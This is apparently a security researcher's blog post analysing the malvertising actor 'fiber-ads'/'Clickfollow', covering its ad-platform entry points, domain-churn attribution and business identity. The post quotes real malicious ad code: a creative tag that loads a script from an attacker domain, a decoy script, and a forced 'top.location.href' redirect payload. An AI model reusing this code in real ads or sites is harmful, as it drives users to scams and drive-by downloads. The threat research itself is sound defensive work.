This blog post explores the techniques and tactics of a persistent malvertiser that operates under a company called “fiber-ads”. We provide an overview of the metrics behind their current and historic activity, a glimpse into their infrastructure, and some details around the impact from exposure to their campaigns.

A History Of High Profile Activity

In the last several months, there have been reports circulating on social media and tech news outlets around malvertisements surfacing through Windows 10 desktop applications. The first details around this activity were published by French security researcher and blogger Malekal:

Shortly after, the story was covered by Bleeping Computer:

While these incidents are somewhat unique in that they are spawned outside of the confines of a web browser, in-app advertisements are not the only vehicle of delivery for this particular attacker. In fact, this application based activity is likely just spill over from this bad actor’s already active and disruptive malvertising rampage.

Our goal is to augment the knowledge that has already been shared with the data that we have available from tracking and blocking this attacker on behalf of our publisher and platform clients.

Tactics, Techniques, & Procedures

This attacker has been been seen on multiple platforms and exchanges. At the time that this attacker first started getting some notice from researchers and the media, the entry point for them was often the following domain:

ads.creative-serving.com

This is the ad serving domain for Platform161, which in this case is acting as the DSP (realtime ad buying platform).

Note: Platform 161 is a victim here and not the perpetrator. We’ve since worked with them to identify and shut off the buyer. (More on that buyer later.)

The creatives are served with little to no variation besides the intermediate ad serving domains that the attackers churn through. The attacker’s creative tag does nothing more than load a script and what looks like an SSP pixel:

document.writeln("<script type=\"text\/javascript\" src=\"hxxps:\/\/www.yukongoldinfo.com\/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=[referreringdomain.com]\"><\/script>");document.writeln("<img src=\"hxxps:\/\/redacted\/sync?dsp_id=4&user_id=0285678c-12f2-4077-9988-48e816b3cb04&ssp=&expires=6&user_group=4&cb=440\" alt=\" \" style=\"display:none\"\/>");

The final script:

!function(t) {

function e(r) {

if (n[r])

return n[r].exports;

var a = n[r] = {

exports: {},

id: r,

loaded: !1

};

return t[r].call(a.exports, a, a.exports, e),

a.loaded = !0,

a.exports

}

var n = {};

return e.m = t,

e.c = n,

e.p = "/min/",

e(0)

}([function(t, e) {

function n() {

return document.getElementsByTagName("script")

}

function r() {

var t = document.createElement("div");

return t.innerHTML = "<a target='_blank' href='hxxps://www.redacted.com/form/signup/freetrial-elf-v2/?d=70130000000EqoP'><img src='hxxps://www.yukongoldinfo.com/uploads/pictures/ab454.jpg' style=\"border:none;\" /> </a>",

t

}

var a = n()

, o = a[a.length - 1]

, c = r();

o.parentNode.appendChild(c)

}

]);

Of course this is a subterfuge, served only to those impressions that don’t pass the targeting criteria as determined by the bad actor’s ad serving domain(s). The code is designed to look like ad tech, but does nothing more than render a fake creative.

In the event the attacker decides to spawn an actual redirect, the user will have an experience much like the one outlined in the original Malekal report:

The evil payload is an all too familiar redirect:

top.location.href="hxxps://chanelets-aurning.com/a54334ea-7651-49b6-aa60-3b66ab1afbd3?dom=redacted&ub=adnexus";

Refresher - Malvertisers rely on forced redirections in order to drive victims to phishing pages, tech support scams, or drive-by downloads. The redirections spawn without any user interaction.

The Attribution Model

Large scale malvertisers tend to leverage at least some automation in their infrastructure deployments as they need to pivot often in order to maintain persistence. These folks are no different.

Let’s take a closer look at their ad serving endpoint(s):

hxxps://www.yukongoldinfo.com/yuk.php?pic=ab454.jpg&pub=yukg&dom=redacted.com&ub=bsw_openx&tre=

[referreringdomain.com]

Fortunately, the automation chosen here provides an extremely reliable attribution formula. The first three letters of the domain are used for the ad serving php script, which is consistently passed this `pic` and other parameters.

Given this pattern, we are easily able to track this attacker’s historic and future behavior. In just 2019 so far, we have seen them churn through over 50 domains, all of which are registered at Namecheap. The complete list is available under Appendix A .

Malvertising activity that fits this MO can be traced back to over 100 additional domains going all the way back to 2017.

New ad serving domains from this malvertiser continue to surface on a weekly basis on varying platforms.

The Business Model

In March 2019, we were fortunate to receive some feedback from one of our platform customers regarding a campaign that fit the attribution model for this attacker. We were told that the buyer, “fiber-ads”, has been active as of January 2019.

We were able to confirm this exact buyer with multiple platform partners as well. We were also told that they recently pivoted to a new corporate identity, “Clickfollow”.

Both companies are based out of Hong Kong:

clickfollow.com